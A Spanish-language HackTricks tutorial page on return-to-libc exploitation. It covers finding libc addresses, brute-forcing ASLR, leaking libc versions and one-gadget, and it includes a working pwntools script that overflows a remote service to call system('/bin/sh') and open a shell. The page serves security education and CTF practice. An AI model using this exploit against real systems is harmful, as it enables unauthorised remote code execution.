Ret2lib

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los PLANES DE SUSCRIPCIÓN!
Obtén el oficial PEASS & HackTricks swag
Descubre The PEASS Family, nuestra colección exclusiva de NFTs
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte tus trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

Información Básica

La esencia de Ret2Libc es redirigir el flujo de ejecución de un programa vulnerable a una función dentro de una biblioteca compartida (por ejemplo, system, execve, strcpy) en lugar de ejecutar shellcode suministrado por el atacante en la pila. El atacante crea un payload que modifica la dirección de retorno en la pila para apuntar a la función de la biblioteca deseada, al mismo tiempo que organiza que los argumentos necesarios se configuren correctamente según la convención de llamada.

Pasos de Ejemplo (simplificados)

Obtener la dirección de la función a llamar (por ejemplo, system) y el comando a llamar (por ejemplo, /bin/sh)
Generar una cadena ROP para pasar el primer argumento apuntando a la cadena de comando y el flujo de ejecución a la función

Encontrar las direcciones

Suponiendo que la libc utilizada es la de la máquina actual, puedes encontrar dónde se cargará en memoria con:

ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)

Si deseas verificar si ASLR está cambiando la dirección de libc, puedes hacer lo siguiente:

for i in `seq 0 20`; do ldd ./<bin> | grep libc; done

Conocer la libc utilizada también es posible encontrar el desplazamiento a la función system con:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system

Saber la libc utilizada también es posible encontrar el desplazamiento a la función de la cadena /bin/sh con:

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh

Usando gdb-peda / GEF

Conociendo la libc utilizada, también es posible usar Peda o GEF para obtener la dirección de la función system, de la función exit y de la cadena /bin/sh:

p system
p exit
find "/bin/sh"

Usando /proc/<PID>/maps

Si el proceso está creando hijos cada vez que interactúas con él (servidor de red), intenta leer ese archivo (probablemente necesitarás ser root).

Aquí puedes encontrar exactamente dónde se carga la libc dentro del proceso y dónde se cargará para cada hijo del proceso.

En este caso se carga en 0xb75dc000 (Esta será la dirección base de la libc)

Librería libc desconocida

Puede ser posible que no sepas qué libc está cargando el binario (porque podría estar ubicado en un servidor al que no tienes acceso). En ese caso podrías abusar de la vulnerabilidad para filtrar algunas direcciones y encontrar qué librería libc se está utilizando:

pageLeaking libc address with ROP

Y puedes encontrar una plantilla de pwntools para esto en:

pageLeaking libc - template

Conocer la libc con 2 offsets

Consulta la página https://libc.blukat.me/ y utiliza un par de direcciones de funciones dentro de la libc para descubrir la versión utilizada.

Saltando ASLR en 32 bits

Estos ataques de fuerza bruta son solo útiles para sistemas de 32 bits.

Si el exploit es local, puedes intentar forzar la dirección base de la libc (útil para sistemas de 32 bits):

for off in range(0xb7000000, 0xb8000000, 0x1000):

Si estás atacando un servidor remoto, podrías intentar hacer fuerza bruta en la dirección de la función usleep de libc, pasando como argumento 10 (por ejemplo). Si en algún momento el servidor tarda 10 segundos adicionales en responder, encontraste la dirección de esta función.

One Gadget

Ejecuta una shell saltando a una dirección específica en libc:

pageOne Gadget

Ejemplo de Código Ret2lib x86

En este ejemplo, la fuerza bruta de ASLR está integrada en el código y el binario vulnerable está ubicado en un servidor remoto:

from pwn import *

c = remote('192.168.85.181',20002)
c.recvline()

for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE, could be address of exit()
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive()

Ejemplo de Código x64 Ret2lib

Ver el ejemplo en:

pageROP - Return Oriented Programing

Ejemplo de ARM64 Ret2lib

En el caso de ARM64, la instrucción ret salta a donde apunte el registro x30 y no a donde apunte el registro de la pila. Por lo tanto, es un poco más complicado.

Además, en ARM64 una instrucción hace lo que la instrucción hace (no es posible saltar en medio de instrucciones y transformarlas en nuevas).

Ver el ejemplo en:

pageRet2lib + Printf leak - arm64

Ret-into-printf (o puts)

Esto permite filtrar información del proceso llamando a printf/puts con algunos datos específicos colocados como argumento. Por ejemplo, poner la dirección de puts en la GOT en una ejecución de puts permitirá filtrar la dirección de puts en memoria.

Ret2printf

Básicamente significa abusar de un Ret2lib para transformarlo en una vulnerabilidad de cadenas de formato de printf utilizando el ret2lib para llamar a printf con los valores para explotarlo (suena inútil pero es posible):

pageFormat Strings

Otros Ejemplos y referencias

https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html
Ret2lib, dado un leak a la dirección de una función en libc, utilizando un gadget
https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html
64 bits, ASLR habilitado pero no PIE, el primer paso es llenar un desbordamiento hasta el byte 0x00 del canary para luego llamar a puts y filtrarlo. Con el canary se crea un gadget ROP para llamar a puts y filtrar la dirección de puts de la GOT y un gadget ROP para llamar a system('/bin/sh')
https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html
64 bits, ASLR habilitado, sin canary, desbordamiento de pila en main desde una función secundaria. Gadget ROP para llamar a puts y filtrar la dirección de puts de la GOT y luego llamar a un gadget.
https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html
64 bits, sin pie, sin canary, sin relro, nx. Usa la función write para filtrar la dirección de write (libc) y llama a un gadget.
https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html
Utiliza una cadena de formato para filtrar el canary de la pila y un desbordamiento de búfer para llamar a system (está en la GOT) con la dirección de /bin/sh.
https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html
32 bits, sin relro, sin canary, nx, pie. Abusa de un mal indexado para filtrar direcciones de libc y heap de la pila. Abusa del desbordamiento de búfer para hacer un ret2lib llamando a system('/bin/sh') (se necesita la dirección del heap para evitar una comprobación).

AnteriorRet2esp / Ret2reg SiguienteLeaking libc address with ROP

Última actualización hace 3 días